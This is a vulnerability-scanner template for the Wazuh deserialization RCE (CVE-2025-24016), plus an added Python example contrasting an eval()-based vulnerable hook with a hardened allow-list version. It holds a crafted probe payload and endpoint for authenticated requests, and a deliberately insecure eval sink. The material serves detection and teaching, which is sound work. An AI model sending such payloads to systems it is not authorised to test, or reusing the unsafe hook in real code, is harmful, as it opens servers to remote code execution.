id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The flaw is unsafe deserialization in the wazuh-manager package: DistributedAPI (DAPI) parameters are serialized as JSON and deserialized with as_wazuh_object in framework/wazuh/core/cluster/common.py. An attacker with API access can inject an unsanitized dictionary into a DAPI request and reach arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and denial of service.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1, where this vulnerability is patched. If an immediate upgrade is not possible: restrict API access to trusted IP addresses only, segment the network to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.93512
    epss-percentile: 0.99833
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln

# Request 1 is a baseline: its internal, negative matcher passes only when the
# landing page does not already contain "NameError", so request 2 runs only
# where that string is a real signal rather than page content.
flow: http(1) && http(2)

variables:
  # Probe only: an undefined class name makes a vulnerable eval-style lookup
  # raise NameError (surfaced as an HTTP 500) instead of executing code.
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  # username and password are not defined in this template; the check is
  # authenticated, so supply API credentials at scan time
  # (e.g. -var username=... -var password=...).
  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100a83fada9883a8ffe2f3b952449545769038303fbd601aa1623b9d99c25104376022100e8886f98ba89a7379dfef07a7fbcb854eccacddb7cf0f2948b926de6d632e9d0:922c64590222798bb761d5b6d8e72950
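The following is an added example, not part of the template above and not Wazuh's code. It models the deserialization pattern the description names (a JSON `object_hook` that turns an `__unhandled_exc__` dictionary back into an exception) in two forms: an `unsafe_as_wazuh_object` that resolves the attacker-supplied `__class__` string with `eval()`, which is the assumed shape of the CWE-502 sink and explains why the template's probe yields a `NameError`, and a `safe_as_wazuh_object` that resolves the name only against built-in exception classes and never evaluates it. The hook names, the `UnsafePayload` exception, and all three JSON inputs are constructed for this example.

```python
import builtins
import json

# Constructed probe, the same shape as the template's `payload` variable.
PROBE = '{"__unhandled_exc__": {"__class__": "NotARealClass", "__args__": []}}'

# Constructed input showing the root cause: the "class name" is an arbitrary
# Python expression. Harmless here (the lambda just returns a string).
EXPRESSION = '{"__unhandled_exc__": {"__class__": "(lambda *a: \'evaluated\')", "__args__": []}}'

# Constructed legitimate message: a real built-in exception to reconstruct.
LEGIT = '{"__unhandled_exc__": {"__class__": "ValueError", "__args__": ["bad input"]}}'


class UnsafePayload(ValueError):
    """Raised by the hardened hook when a message fails validation."""


def unsafe_as_wazuh_object(dct):
    """Model of the vulnerable hook (an assumption, not Wazuh's code): the class
    name taken from untrusted JSON is handed straight to eval()."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        return eval(exc["__class__"])(*exc["__args__"])  # CWE-502 sink
    return dct


def safe_as_wazuh_object(dct):
    """Hardened hook: the name must be an attribute of `builtins` that is an
    exception class; anything else is rejected before any object is built."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        name = exc.get("__class__")
        cls = getattr(builtins, name, None) if isinstance(name, str) else None
        if not (isinstance(cls, type) and issubclass(cls, BaseException)):
            raise UnsafePayload(f"refusing to deserialize exception class {name!r}")
        args = exc.get("__args__", [])
        if not isinstance(args, list):
            raise UnsafePayload("__args__ must be a list")
        return cls(*args)
    return dct


def decode(payload, hook):
    """Run a JSON document through an object_hook the way a receiver would.
    Returns ("ok", value) or ("error", <exception class name>)."""
    try:
        return "ok", json.loads(payload, object_hook=hook)
    except Exception as e:  # report the class name, which is what the template matches on
        return "error", type(e).__name__


if __name__ == "__main__":
    for label, payload in (("probe", PROBE), ("expression", EXPRESSION), ("legit", LEGIT)):
        print(f"{label:10} unsafe -> {decode(payload, unsafe_as_wazuh_object)}")
        print(f"{label:10} safe   -> {decode(payload, safe_as_wazuh_object)}")
```

Against the unsafe hook the probe produces `NameError`, which is the string the template's second request matches on, while the lambda input is actually executed; the hardened hook rejects both with `UnsafePayload` and still reconstructs the legitimate `ValueError`. The allow-list check (`isinstance(cls, type) and issubclass(cls, BaseException)`) also rejects names such as `eval` or `__import__` that exist in `builtins` but are not exception classes.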